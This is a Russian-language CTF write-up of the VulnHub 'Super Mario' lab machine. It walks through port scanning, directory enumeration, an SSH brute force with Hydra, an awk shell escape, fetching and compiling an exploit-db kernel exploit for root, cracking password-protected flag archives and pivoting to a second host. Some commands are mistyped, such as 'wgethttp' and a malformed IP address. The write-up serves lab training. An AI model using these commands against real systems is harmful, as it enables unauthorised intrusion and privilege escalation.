Приветствую! В этой статье я хочу поделиться одним из способов прохождения
CTF Challenge – Super Mario VM.
Для начала, как обычно, скачиваем образ уязвимой машины по ссылке ниже:
> https://download.vulnhub.com/supermariohost/Super-Mario-Host-v1.0.1.ova.torrent
В качестве атакующего хоста, я буду использовать
Kali Linux 2017.1.
Запускаем образ машины с помощью VMware (к примеру) и проводим первичный осмотр, запускаем netdiscover, чтобы обнаружить хост в сети.
Затем сканируем порты с помощью
nmap:
Сканер обнаружил 2 открытых порта, в первую очередь заглянем на http – 8180.
После осмотра содержимого находящегося по адресу 172.16.0.193:8180, никаких подсказок или флагов не было обнаружено. Поэтому можем попробовать Dirbuster для поиска скрытого содержимого на сервере.
Dirbuster ко всему прочему, обнаружил один любопытный файл – vhosts.
Откроем его в браузере:
Изучив его, находим имя виртуального хоста - Что такое виртуальный хост? Это такая настройка локального веб-сервера, при которой веб-сервер начинает откликаться на заданное имя, а не только на IP 127.0.0.1 или псевдоним localhost. То есть, при настройке виртуального хоста на имя site.ru, в браузере, поэтому URL начнет отвечать локальный веб-сервер.
Веб-сервер можно настроить на несколько имен сайтов. Тогда веб-сервер начнет выдавать страницы, соответствующие каталогу, в котором находятся данные для указанного имени. Например, есть два виртуальных хоста - site.ru и money.com. Для site.ru настроен рабочий каталог /var/www/site.ru, а для money.com настроен рабочий каталог /var/www/money.com. Если теперь в браузере обратиться к site.ru, то веб-сервер будет выдавать страницы из каталога /var/www/site.ru, а если обратиться к money.com, то веб-сервер будет генерировать страницы из каталога /var/www/money.com.
Пропишем его себе в /etc/hosts и сохраним:
>
nano /etc/hosts
Обратившись по адресу – mario.supermariohost.local:8180, видим это:
И собственно больше ничего, поэтому я пробую подключать Dirbuster снова, только теперь на этот хост.
Из найденных файлов интерес представляет – command.php, он представляет собой форму для проверки существования пользователей (я, по крайней мере, так и понял).
Мне это не сильно помогло, но сама идея натолкнула на мысль создать файл с паролями и логинами согласно теме из Mario.
Затем, используя следующую команду, генерируем файл, конкретно с данными подходящими для дальнейшего перебора.
Теперь, имея на руках файлы с именами пользователей и паролями, можно запустить брутфорс SSH, используем Hydra.
>
hydra –L user.txt –P pass.txt 192.168.0.107 ssh
Логинимся по SSH используя подобранный логин и пароль:
Так как shell слишком лимитирован, необходимо воспользоваться AWK для использования BASH окружения:
Утилита awk, или точнее GNU awk, в сравнении с sed, выводит обработку потоков данных на более высокий уровень. Благодаря awk в нашем распоряжении оказывается язык программирования, а не довольно скромный набор команд, отдаваемых редактору. С помощью языка программирования awk можно выполнять следующие действия:
· Объявлять переменные для хранения данных.
· Использовать арифметические и строковые операторы для работы с данными.
· Использовать структурные элементы и управляющие конструкции языка, такие, как оператор if-then и циклы, что позволяет реализовать сложные алгоритмы обработки данных.
· Создавать форматированные отчёты.
Следующей командой получим полнофункциональный shell:
>
awk ‘BEGIN{system(“/bin/bash”)}’
Выясним версию ядра ОС.
Теперь, можно обратиться за помощью к ExploitDB для подбора нужного експлойта:
Качаем эксплоит напрямую на уязвимый хост:
>
wgethttp://exploit-db.com/download/37292
Затем компилируем и запускаем файл a.out
>
mv 37292 37292.c
>
gcc 37292.c
>
./a.out
Проверим, насколько успешно все прошло:
>
id
И опять обратимся к awk, чтобы получить рабочий шелл bash:
>
awk ‘BEGIN{system(“/bin/bash”)}’
В корневой папке находится архив с флагом,
flag.zip скопируем его на атакующий хост, так как он защищен паролем.
>
scp flag.zip necro@192.168.0.106:/home/necro
Достать флаг не сложно, достаточно использовать утилиту
fcrackzip:
>
fcrackzip flag.txt –D –p /usr/share/wordlist/rockyou.txt –u
Открыв архив, используя полученный пароль, можно ознакомиться с содержимым флага.
Идем далее, для получения второго флага необходимо обратить внимание на 2 момента:
1. Директорию .bak/users/luigi
2. Файл id_rsa.pub
Файл id_rsa.pub – это открытый ключ для доступа по SSH. Его копируют на сервера, куда нужно получить доступ. Если открыть его в
cat, то в конце файла можно заметить фрагмент -
warluigi@warluigiэто очень похоже на то, что существует еще один хост на который можно зайти, используя данную информацию, в частности логин
warluigi. Следующим шагом будет просмотр таблицы маршрутизации:
>
arp –n
Вот, собственно, то, что мы искали. Есть хост с адресом
192.168.122.112.Пробуем получить к нему доступ, используя ту информацию, что у нас есть, а именно открытый ключ и логин.
>
ssh -i id_rsa warluigi@192.168.1.122.112
Так как, метод подключения использует публичный ключ и нам необходим не пароль а ключевая фраза для подключения, можно предположить, что она не будет замысловатой а сгодится –
warluigi.Так мы попадаем на нужный хост.
Скачиваем и компилируем уже знакомый нам эксплоит:
>
wgethttp://exploit-db.com/download/37292
>
mv 37292 37292.c
>
gcc 37292.c
>
./a.out
> awk ‘BEGIN{system(“/bin/bash”)}’ –Укажет нам, на то, что мы являемся root.
В домашней директории root находится файл с подсказкой для извлечения второго флага, который тоже находится в этой директории, подсказка выглядит так – Peach Loves Me. Второй флаг, так же, защищен паролем, и подсказка им является.
>
unzip flag2.zip
Вводим пароль
peachlovesme и получаем второй и заключительный флаг.
На этом, прохождение Super Mario VM можно считать законченным.